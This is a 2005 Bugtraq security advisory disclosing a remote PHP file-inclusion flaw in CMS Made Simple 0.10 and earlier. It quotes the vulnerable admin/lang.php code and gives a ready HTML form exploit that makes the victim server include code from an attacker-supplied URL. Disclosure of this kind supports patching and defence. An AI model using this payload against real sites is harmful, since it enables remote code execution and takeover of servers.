'CMS Made Simple <= 0.10 - PHP injection'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    CMS Made Simple <= 0.10 - PHP injection
From:       groszynskif () gmail ! com
Date:       2005-08-31 19:18:04
Message-ID: 20050831191804.11058.qmail () securityfocus ! com
[Download RAW message or body]

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: CMS Made Simple - PHP injection 
   Version <= 0.10
   Homepage: http://www.cmsmadesimple.org/

   Author: Filip Groszynski (VXSfx)
   Date: 31 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

	CMS Made Simple is an easy to use content managment
   system for simple stable content site. Uses PHP, MySQL
   and Smarty templating system.

   --------------------------------------------------------
   
   Vulnerable code exist in ./admin/lang.php:

   <?php
 	...
	$current_language = "en_US";
	#Only do language stuff for admin pages
[!]	if (isset($CMS_ADMIN_PAGE)) {
		...
		#Check to see if there is already a language in use...
		if (isset($_POST["change_cms_lang"])) {
[!]			$current_language = $_POST["change_cms_lang"];
			setcookie("cms_language", $_POST["change_cms_lang"]);
		} else if (isset($_COOKIE["cms_language"])) {
			$current_language = $_COOKIE["cms_language"];
		}
		else {
			...
		}

		#Ok, we have a language to load, let's load it already...
		if (isset($nls['file'][$current_language])) {
			foreach ($nls['file'][$current_language] as $onefile) {
[!]				include($onefile);
			}
		}
		...
	}
	...
   ?>
   --------------------------------------------------------

   Exploit:

	example.html:
	  <form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" \
method=post>  <input type=hidden name=change_cms_lang value=vx>
	  <input type=submit name=test VALUE="do it">
	  </form>
	EOF

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif <|> gmail <|> com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic